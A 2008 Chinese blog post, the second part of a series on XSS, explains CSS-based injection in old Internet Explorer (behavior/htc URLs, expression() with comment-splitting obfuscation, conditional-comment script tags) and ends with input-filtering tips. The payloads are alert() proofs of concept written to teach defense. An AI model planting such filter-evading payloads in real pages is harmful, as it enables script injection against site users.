常见的 XSS 注入攻击方式 Part.2 2
作者:grace 来源:gracecode.com 发布时间:2008-11-10 12:42:00
标签:xss,注入,攻击,数据,css
接上一期,这里主要考虑 CSS 注入的方式。CSS 注入主要为背景图注入和针对 Exploer 的 CSS Expression 注入。
考虑没有完全将样式过滤的情况,下面的代码即有可能成为攻击代码
<xss style="behavior: url(xss.htc);">
上面的是针对 Exploer 的 htc 注入,htc 可以认为是个脚本。
<div style="background-image: xss.jpg">
谁会知道 xss.jpg 是什么内容呢?不过很多站点统计代码也是使用了这一原理。
<div style="width: expression(alert('xss'));">
<img style="xss:expr/*xss*/ession(alert('xss'))">
exp/*<A style='noxss:noxss("*//*");xss:ex/*xss*//*/*/pression(alert("xss"))'>
针对 Exploer 的 Expression 要保持“淡定”,最好的做法就是过滤 style 属性。
如果没有将注释完全过滤充分,则又会在 Exploer 出现典型的注入漏洞
<!--[if gte IE 4]>
<script>alert('xss');</script>
<![endif]-->
安全性问题,这个时候我反而感谢 Exploer 提供那么多的“机会”。
-- Split --
那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips
假定所有的用户输入数据都是“ * ”的
弱类型的脚本语言必须保证类型和期望的一致
考虑周全的正则表达式
strip_tags、htmlspecialchars 这类函数很好用
外部的 Javascript 不一定就是可靠的
引号过滤必须要重点注意
除去不必要的 HTML 注释
Exploer 求你放过我吧……
0
投稿
猜你喜欢
- 在 beta3 的时候,我用 hd.img 制作了一张引导软盘,并且用 iso 文件来安装。这次,我准备变换一种方式,不用再制作软盘了。 上
- 首先打开IIS,找到我们的数据库。我们试一下是不是能够下载,正常的情况能够下载的。现在我们就开始配置IIS不让数据库被别人下载,我们在数据库
- 新的广告管理功能概述 如果您以前曾生成过广告代码,那么您会注意到随着我们最新功能的发布,帐户中会发生一些变化。借助新的广告管理功能,您可以在
- 1,我自己琢磨网站有三四年了,真正赚钱是从今年开始。以下是我从开始做网站到现在的一些情况。本文首发我的个站[张顺海].2,现在我的主站IP日
- 打开:require/sendemail.php查找第一个(269行左右):fwrite($fp, $msg); 在此行
- 今日发布godaddy使用教程 系列日志第一篇:后台概览,其实我也是新手,只是希望和大家分享一下经验,让更多人了解一下国外比较优秀的idc后
- 在网络上,匿名FTP是一个很常用的服务,常用于网站,软件交流网站等,为了提高匿名FTP服务开放的过程中的安全性,我们就这一问题进行一些讨论。
- 了解缓存中毒攻击近来,网络上出现史上最强大的互联网漏洞——DNS缓存漏洞,此漏洞直指我们应用中互联网脆弱的安全系统,而安全性差的根源在于设计
- 大家好,我是A5安全小组 jack ,今天跟大家交流下 关于WEB服务器安全的相关问题。其实,在服务器和网站的安全设置方面,我虽然有一些经验
- 服务器虚拟化只需要较少的硬件资源就能运行多重应用程序和操作系统,能允许用户根据自身需求快速调配新的资源。但是这些灵活性也导致网络和安全管理者
- 前几天看到一篇文章,作者怎么说,现在最不缺的就是站长,在大街上一抓一大把,虽说有点夸张,不过也不为过。网络给人了太多的梦想,网络也成就了太多
- 近日在IT龙门阵被面授了一些大淘宝战略的玄机,先说点题外的话,PPT写的很精彩,特别是提供了一些比较新颖的图,另外淘宝的对外宣讲的纪律性也非
- WordPress 3.2 RC2现今发布了,如果你还没有测试过WordPress 3.2,现在是时候了,但如果你不是特别有冒险精神的话,不
- 核心提示: 2.0的疲势在于盈利模式的不清晰,盈利模式的不清晰,又在于它没有一张清晰的脸,也就是首页。web2.0,有如digg、delic
- 怎样设置Godaddy的企业邮局呢?今天就教大家设置企业邮局。首先,要把域名的MX记录做一下解析:MX 0 – smtp.secureser
- Apache服务器的设置文件位于/usr/local/apache/conf/目录下,传统上使用三个配置文件httpd.conf, acce
- 网页抓取优先策略也称为“页面选择问题”(page Selection),通常是尽可能地首先抓取重要性的网页,这样保证在有限的资源内尽可能地照
- UCenter Home(简称UCHome)新版本即将推出。在即将开始测试UCenter Home 2.0中,针对1.5版本新增了六大互动新
- 怎样更改GoDaddy主机的FTP账户密码呢?如果有必要,你可以使用Hosting Control Center来更改你的托管帐户的密码。这
- 所谓虚拟主机,就是n个网站都放在一台服务器上。对于访问量较小的网站,选择独立主机太浪费了,所以一般都是使用虚拟主机来搭建网站。目前有很多提供